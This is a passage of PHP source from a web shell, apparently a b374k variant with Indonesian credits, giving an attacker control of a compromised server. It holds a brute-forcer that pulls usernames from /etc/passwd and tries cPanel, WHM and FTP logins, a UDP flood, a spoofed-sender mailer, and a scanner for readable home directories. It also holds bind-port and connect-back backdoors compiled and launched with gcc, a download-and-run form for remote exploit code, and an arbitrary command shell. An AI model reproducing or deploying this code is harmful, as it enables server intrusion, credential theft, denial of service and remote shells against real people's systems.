.$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> ok <span class=\"gaya\
">]</span></p>"; $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>"; f
or($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysq

l_field_name($hasil,$i))."</th>"; $msg .= "</tr>"; for($i=0;$i<@mysql_num_rows($

hasil);$i++) { $rows=@mysql_fetch_array($hasil); $msg .= "<tr>"; for($j=0;$j<@my
sql_num_fields($hasil);$j++) { if($rows[$j] == "") $dataz = "&nbsp;"; else $data
z = $rows[$j]; $msg .= "<td>".$dataz."</td>"; } $msg .= "</tr>"; } $msg .= "</ta
ble>"; } else $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> error <span class=\"gaya\">]</sp
an></p>"; } } } else { $query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS
;"; $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\
"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hi
dden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" val
ue=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluse
r."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <inpu
t type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidde
n\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"outp
ut\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=
\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\
"Go !\" /></p> </form></div> "; $dbs = array(); $msg .= "<table class=\"explore\
" style=\"width:99%;\"><tr><th>available databases</th></tr>"; $hasil = @mysql_l
ist_dbs($con); while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db
); } @sort($dbs); foreach($dbs as $db){ $msg .= "<tr><td><a href=\"?y=".$pwd."&a
mp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlp
ass."&amp;sqlport=".$sqlport."&amp;db=".$db."\">$db</a></td></tr>"; } $msg .= "<
/table>"; } @mysql_close($con); } else $msg = "<p style=\"text-align:center;\">c
ant connect to mysql server</p>"; echo $msg; } else{ ?> <form action="?" method=
"get"> <input type="hidden" name="y" value="<?php echo $pwd; ?>" /> <input type=
"hidden" name="x" value="mysql" /> <table class="tabnet" style="width:300px;"> <
tr><th colspan="2">Connect to mySQL server</th></tr> <tr><td>&nbsp;&nbsp;Host</t
d><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" valu
e="localhost" /></td></tr> <tr><td>&nbsp;&nbsp;Username</td><td><input style="wi
dth:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr>
<tr><td>&nbsp;&nbsp;Password</td><td><input style="width:220px;" class="inputz"
type="text" name="sqlpass" value="password" /></td></tr> <tr><td>&nbsp;&nbsp;Por
t</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" v
alue="3306" />&nbsp;<input style="width:19%;" class="inputzbut" type="submit" va
lue="Go !" name="submitsql" /></td></tr> </table> </form> <?php }} elseif(isset(
$_GET['x']) && ($_GET['x'] == 'mail')){ if(isset($_POST['mail_send'])){ $mail_to
= $_POST['mail_to']; $mail_from = $_POST['mail_from']; $mail_subject = $_POST['
mail_subject']; $mail_content = magicboom($_POST['mail_content']); if(@mail($mai
l_to,$mail_subject,$mail_content,"FROM:$mail_from")){ $msg = "email sent to $mai
l_to"; } else $msg = "send email failed"; } ?> <form action="?y=<?php echo $pwd;
?>&amp;x=mail" method="post"> <table class="cmdbox"> <tr><td> <textarea class="
output" name="mail_content" id="cmd" style="height:340px;">Hey there, please pat
ch me ASAP ;-p</textarea> <tr><td>&nbsp;<input class="inputz" style="width:20%;"
type="text" value="admin@somesome.com" name="mail_to" />&nbsp; mail to</td></tr
> <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="b374
k@fbi.gov" name="mail_from" />&nbsp; from</td></tr> <tr><td>&nbsp;<input class="
inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" />&n
bsp; subject</td></tr> <tr><td>&nbsp;<input style="width:19%;" class="inputzbut"
type="submit" value="Go !" name="mail_send" /></td></tr></form> <tr><td>&nbsp;&
nbsp;&nbsp;&nbsp;<?php echo $msg; ?></td></tr> </table> </form> <?php }
elseif(isset($_GET['x']) && ($_GET['x'] == 'brute')){ ?>
<form action="?y=<?php echo $pwd; ?>&amp;x=brute" method="post">
<?php
//bruteforce
// HN TEAM [HN FAMILY]
@ini_set('memory_limit', 999999999999);
$connect_timeout=5;
@set_time_limit(0);

$pokeng = $_REQUEST['submit'];
$hn = $_REQUEST['users'];
$crew = $_REQUEST['passwords'];
$pasti = $_REQUEST['sasaran'];
$manualtarget = $_REQUEST['target'];
$bisa = $_REQUEST['option'];
if($pasti == ''){
$pasti = 'localhost';
}
if($manualtarget == ''){
$manualtarget = 'http://localhost:2082';
}
function get_users()
{
$users = array();
$rows=file('/etc/passwd');
if(!$rows) return 0;
foreach ($rows as $string)
{
$user = @explode(":",$string);
if(substr($string,0,1)!='#') array_push($users,$user[0]);
}
return $users;
}
if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$
lang[$language.'_text96']."</font></center>"; }
else
{
print " <div align='center'>
<form method='post' style='border: 1px solid #000000'><br><br>
<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 c
ellPadding=5 width='40%' bgColor=#303030 borderColorLight=#666666 border=1><tr><
td>
<b> sasaran : </font><input type='text' name='sasaran' size='16' value= $pasti c
lass='inputz'></p></font></b></p>
<div align='center'><br>
<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 c
ellPadding=5 width='50%' bgColor=#303030 borderColorLight=#666666 border=1>
<tr>
<td align='center'>
<b>User</b></td>
<td>
<p align='center'>
<b>Pass</b></td>
</tr>
</table>
<p align='center'>
<textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; bac
kground-color: #000000; color:#C0C0C0' >";foreach($users as $user) { echo $user.
"\n"; } print"</textarea>
<textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D;
background-color: #000000; color:#C0C0C0'>$crew</textarea><br>
<br>
<b>Pilih dahk : </span><input name='option' value='manual' style='font-weight: 7
00;' type='radio'> Manual Target Brute : <input type='text' name='target' size='
16' class='inputz' value= $manualtarget ><br />
<input name='option' value='cpanel' style='font-weight: 700;' checked type='radi
o'> cPanel
<input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp

<input name='option' value='whm' style='font-weight: 700;' type='radio'> whm ==>

<input type='submit' value='brute' name='submit' class='inputzbut'></p>
</td></tr></table></td></tr></form><p align= 'left'>";}
?>
<?php
function manual_check($anjink,$asu,$babi,$lonte){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$anjink");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) {
print "<b> Gagal : ahh,,kelama'an , sasaranmu udah tepat blonnd?? !</b>";
exit;}
elseif ( curl_errno($ch) == 0 ){
print
"<b>[ james0baster@james0baster.web.id ]# </b>
<b>Serangan selesai , nihk username = <font color='#FF0000'> $asu </font> dan pa
sswordnya =
<font color='#FF0000'> $babi </font></b><br>";}curl_close($ch);}
function ftp_check($anjink,$asu,$babi,$lonte){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "ftp://$anjink");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) {
print "<b> Gagal : ahh,,kelama'an , sasaranmu udah tepat blonnd?? !</b>";
exit;}
elseif ( curl_errno($ch) == 0 ){
print
"<b>[ james0baster@james0baster.web.id ]# </b>
<b> serangan selesai , nihk username = <font color='#FF0000'> $asu </font> dan p
asswordnya =
<font color='#FF0000'> $babi </font></b><br>";}curl_close($ch);}
function cpanel_check($anjink,$asu,$babi,$lonte){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$anjink:2082");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) {

print "<b> Gagal : ahh,,kelama'an , sasaranmu udah tepat blonnd?? !</b>";

exit;}
elseif ( curl_errno($ch) == 0 ){
print
"<b>[ james0baster@james0baster.web.id ]# </b>
<b>Serangan selesai , nihk username = <font color='#FF0000'> $asu </font> dan pa
sswordnya =
<font color='#FF0000'> $babi </font></b><br>";}curl_close($ch);}
function whm_check($anjink,$asu,$babi,$lonte){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$anjink:2086");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) {
print "<b> Gagal : ahh,,kelama'an , sasaranmu udah tepat blonnd?? !</b>";
exit;}
elseif ( curl_errno($ch) == 0 ){
print
"<b>[ james0baster@james0baster.web.id ]# </b>
<b>Serangan selesai , nihk username = <font color='#FF0000'> $asu </font> dan pa
sswordnya =
<font color='#FF0000'> $babi </font></b><br>";}curl_close($ch);}
if(isset($pokeng) && !empty($pokeng)){
$userlist = explode ("\n" , $hn );
$passlist = explode ("\n" , $crew );
print "<b>[ james0baster@james0baster.web.id ]# Seraaaanngg ... </font></b><br>"
;
foreach ($userlist as $asu) {
$_user = trim($asu);
foreach ($passlist as $babi ) {
$_pass = trim($babi);
if ($bisa == "manual")
{
manual_check($manualtarget,$_user,$_pass,$lonte);
}
if($bisa == "ftp"){
ftp_check($pasti,$_user,$_pass,$lonte);
}
if ($bisa == "cpanel")
{
cpanel_check($pasti,$_user,$_pass,$lonte);
}
if ($bisa == "whm")
{
whm_check($pasti,$_user,$_pass,$lonte);
}
}
}
}
}

//bruteforce

elseif(isset($_GET['x']) && ($_GET['x'] == 'readable')){

?>
<form action="?y=<?php echo $pwd; ?>&amp;x=readable" method="post">
<?php
//radable public_html
echo '<html><head><title>james0baster Cpanel finder</title></head><body>';
($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</
b>');
set_time_limit(0);
###################
@$passwd = fopen('/etc/passwd','r');
if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
$pub = array();
$users = array();
$conf = array();
$i = 0;
while(!feof($passwd))
{
$str = fgets($passwd);
if ($i > 35)
{
$pos = strpos($str,':');
$username = substr($str,0,$pos);
$dirz = '/home/'.$username.'/public_html/';
if (($username != ''))
{
if (is_readable($dirz))
{
array_push($users,$username);
array_push($pub,$dirz);
}
}
}
$i++;
}
###################
echo '<br><br><textarea class="output" >';
echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
echo "[~] Searching for passwords in config files...\n\n";
foreach ($users as $user)
{
$path = "/home/$user/public_html/";
echo "$path \n";
}
echo "\n";
echo "[+] Tinggal Kopas ke view file/folder list yang ada di explorer \n[+] Fini
shed\n";
echo '</textarea><br><br>Coded by <b>IndonesianHacker</b> & <b>james0baster</b>
<a href=http://james0baster.web.id>Homepage</a></body></html>';
//radable public_html
}

elseif(isset($_GET['x']) && ($_GET['x'] == 'dos')){

?>
<form action="?y=<?php echo $pwd; ?>&amp;x=dos" method="post">
<?php
//UDP
if(isset($_GET['host'])&&isset($_GET['time'])){
$packets = 0;
ignore_user_abort(TRUE);
set_time_limit(0);
$exec_time = $_GET['time'];
$time = time();
//print "Started: ".time('d-m-y h:i:s')."<br>";
$max_time = $time+$exec_time;
$host = $_GET['host'];
for($i=0;$i<65000;$i++){
$out .= 'X';
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$rand = rand(1,65000);
$fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1
024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets p
er second \n";
echo '<br><br>
<form action="'.$surl.'" method=GET>
<input type="hidden" name="act" value="phptools">
Host: <br><input type=text name=host><br>
Length (seconds): <br><input type=text name=time><br>
<input type=submit value=Go></form>';
}else{ echo '<center><form action=? method=GET><input type="hidden" name="act" v
alue="phptools">
<table class="tabnet" style="width:300px;"> <tr><th colspan="2">UDP Flood</th></
tr> <tr><td>&nbsp;&nbsp;Host</td><td><input style="width:220px;" class="inputz"
type=text name=host value=></td></tr> <tr><td>&nbsp;&nbsp;Length (seconds)</td><
td><input style="width:220px;" class="inputz" type=text name=time value=></td></
tr> <tr><td><input style="width:100%;" class="inputzbut" type="submit" value="Go
!" /></td></tr> </table></center>';
}
}

elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){ @ob_start(); @eval("phpi

nfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"<bo
dy>")+6; $akhir = strpos($buff,"</body>"); echo "<div class=\"phpinfo\">".substr

($buff,$awal,$akhir-$awal)."</div>"; } elseif(isset($_GET['view']) && ($_GET['vi

ew'] != "")){ if(is_file($_GET['view'])){ if(!isset($file)) $file = magicboom($_
GET['view']); if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $gr
oup=@posix_getgrgid(@filegroup($file)); $owner = $name['name']."<span class=\"ga
ya\"> : </span>".$group['name']; } else { $owner = $user; } $filn = basename($fi
le); echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\"> <tr><td>Filena
me</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span> <form action
=\"?y=".$pwd."&amp;view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\
" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=
\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" /> <input class=\"
inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."
\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\
" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" /
> </form> </td></tr> <tr><td>Size</td><td>".ukuran($file)."</td></tr> <tr><td>Pe
rmission</td><td>".get_perms($file)."</td></tr> <tr><td>Owner</td><td>".$owner."
</td></tr> <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</
td></tr> <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</
td></tr> <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</
td></tr> <tr><td>Actions</td><td><a href=\"?y=$pwd&amp;edit=$file\">edit</a> | <
a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_fo
rm');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$file\">delete</a> | <a href=\
"?y=$pwd&amp;dl=$file\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$file\">
gzip</a>)</td></tr> <tr><td>View</td><td><a href=\"?y=".$pwd."&amp;view=".$file.
"\">text</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=code\">code</a>
| <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=image\">image</a></td></tr>
</table> "; if(isset($_GET['type']) && ($_GET['type']=='image')){ echo "<div st
yle=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&amp;img=".$filn."\"
></div>"; } elseif(isset($_GET['type']) && ($_GET['type']=='code')){ echo "<div
class=\"viewfile\">"; $file = wordwrap(@file_get_contents($file),"240","\n"); @h
ighlight_string($file); echo "</div>"; } else { echo "<div class=\"viewfile\">";
echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; } } elsei
f(is_dir($_GET['view'])){ echo showdir($pwd,$prompt); } } elseif(isset($_GET['ed
it']) && ($_GET['edit'] != "")){ if(isset($_POST['save'])){ $file = $_POST['save
as']; $content = magicboom($_POST['content']); if($filez = @fopen($file,"w")){ $
time = date("d-M-Y H:i",time()); if(@fwrite($filez,$content)) $msg = "file saved
<span class=\"gaya\">@</span> ".$time; else $msg = "failed to save"; @fclose($f
ilez); } else $msg = "permission denied"; } if(!isset($file)) $file = $_GET['edi
t']; if($filez = @fopen($file,"r")){ $content = ""; while(!feof($filez)){ $conte
nt .= htmlentities(str_replace("''","'",fgets($filez))); } @fclose($filez); } ?>
<form action="?y=<?php echo $pwd; ?>&amp;edit=<?php echo $file; ?>" method="pos
t"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" name="c
ontent"> <?php echo $content; ?> </textarea> <tr><td colspan="2">Save as <input
onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" st
yle="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="s
ubmit" value="Save !" name="save" style="width:12%;" /> &nbsp;<?php echo $msg; ?
></td></tr> </table> </form> <?php } elseif(isset($_GET['x']) && ($_GET['x'] ==
'upload')){ if(isset($_POST['uploadcomp'])){ if(is_uploaded_file($_FILES['file']
['tmp_name'])){ $path = magicboom($_POST['path']); $fname = $_FILES['file']['nam
e']; $tmp_name = $_FILES['file']['tmp_name']; $pindah = $path.$fname; $stat = @m
ove_uploaded_file($tmp_name,$pindah); if ($stat) { $msg = "file uploaded to $pin
dah"; } else $msg = "failed to upload $fname"; } else $msg = "failed to upload $
fname"; } elseif(isset($_POST['uploadurl'])){ $pilihan = trim($_POST['pilihan'])
; $wurl = trim($_POST['wurl']); $path = magicboom($_POST['path']); $namafile = d
ownload($pilihan,$wurl); $pindah = $path.$namafile; if(is_file($pindah)) { $msg
= "file uploaded to $pindah"; } else $msg = "failed to upload $namafile"; } ?> <
form action="?y=<?php echo $pwd; ?>&amp;x=upload" enctype="multipart/form-data"
method="post"> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th
colspan="2">Upload from computer</th></tr> <tr><td colspan="2"><p style="text-a
lign:center;"><input style="color:#000000;" type="file" name="file" /><input typ

e="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></

p></td> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;"
name="path" value="<?php echo $pwd; ?>" /></td></tr> </tr> </table></form> <tab
le class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload
from url</th></tr> <tr><td colspan="2"><form method="post" style="margin:0;padd
ing:0;" actions="?y=<?php echo $pwd; ?>&amp;x=upload"> <table><tr><td>url</td><t
d><input class="inputz" type="text" name="wurl" style="width:250px;" value="http
://www.some-code/exploits.c"></td></tr> <tr><td colspan="2"><input type="text" c
lass="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td>
</tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwg
et">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fre
ad</option> <option value="wfetch">fetch</option> <option value="wlinks">links</
option> <option value="wget">GET</option> <option value="wcurl">curl</option> </
select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzb
ut" value="Go" style="width:246px;"></td></tr></form></table></td> </tr> </table
> <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php } e
lseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit')){ if (isset($_POST['bind'
]) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] ==
'C')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tul
is("bdc.c",$port_bind_bd_c); exe("gcc -o bdc bdc.c"); exe("chmod 777 bdc"); @unl
ink("bdc.c"); exe("./bdc ".$port." ".$passwrd." &"); $scan = exe("ps aux"); if(e
regi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup succ
essfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setu
p successfully.</p>"; } } elseif (isset($_POST['bind']) && !empty($_POST['port']
) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) { $port = trim($_
POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdp",$port_bind_bd_p
l); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan
= exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found runn
ing, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found ru
nning, backdoor not setup successfully.</p>"; } } elseif (isset($_POST['backconn
']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == '
C')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcc.c"
,$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c
"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip."
port ".$port." ..."; } elseif (isset($_POST['backconn']) && !empty($_POST['backp
ort']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) { $ip = trim($_POST
['ip']); $port = trim($_POST['backport']); tulis("bcp",$back_connect); exe("chmo
d +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now
script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['expco
mpile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) { $pilihan = trim(
$_POST['pilihan']); $wurl = trim($_POST['wurl']); $namafile = download($pilihan,
$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file n
ot found $namafile"; } ?> <table class="tabnet"> <tr><th>Port Binding</th><th>Co
nnect Back</th><th>Load and Exploit</th></tr> <tr> <td> <table> <form method="po
st" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>Port</td><td><inpu
t class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?
>"></td></tr> <tr><td>Password</td><td><input class="inputz" type="text" name="b
ind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr> <tr><td>Use
</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use
"><option value="Perl">Perl</option><option value="C">C</option></select> <input
class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></
td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?ph
p echo $pwd; ?>&amp;x=netsploit"> <tr><td>IP</td><td><input class="inputz" type=
"text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv(
'REMOTE_ADDR')) : ("127.0.0.1")); ?>"></td></tr> <tr><td>Port</td><td><input cla
ss="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?
>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select size="1"
class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C
</option></select> <input type="submit" name="backconn" value="Connect" class="i
nputzbut" style="width:120px"></td></tr></form> </table> </td> <td> <table> <for

m method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>url</t

d><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="
www.some-code/exploits.c"></td></tr> <tr><td>cmd</td><td><input class="inputz" t
ype="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;ch
mod +x exploits;./exploits;"></td> </tr> <tr><td><select size="1" class="inputz"
name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx<
/option> <option value="wfread">fread</option> <option value="wfetch">fetch</opt
ion> <option value="wlinks">links</option> <option value="wget">GET</option> <op
tion value="wcurl">curl</option> </select></td><td colspan="2"><input type="subm
it" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></t
r></form> </table> </td> </tr> </table> <div style="text-align:center;margin:2px
;"><?php echo $msg; ?></div> <?php } elseif(isset($_GET['x']) && ($_GET['x'] ==
'shell')){ ?> <form action="?y=<?php echo $pwd; ?>&amp;x=shell" method="post"> <
table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" readonly> <?
php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea>
<tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id=
"cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input
class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;
" /></td></tr> </table> </form> <?php } else { if(isset($_GET['delete']) && ($_G
ET['delete'] != "")){ $file = $_GET['delete']; @unlink($file); } elseif(isset($_
GET['fdelete']) && ($_GET['fdelete'] != "")){ @rmdir(rtrim($_GET['fdelete'],DIRE
CTORY_SEPARATOR)); } elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){ $p
ath = $pwd.$_GET['mkdir']; @mkdir($path); } $buff = showdir($pwd,$prompt); echo
$buff; } ?> </div> </body> </html>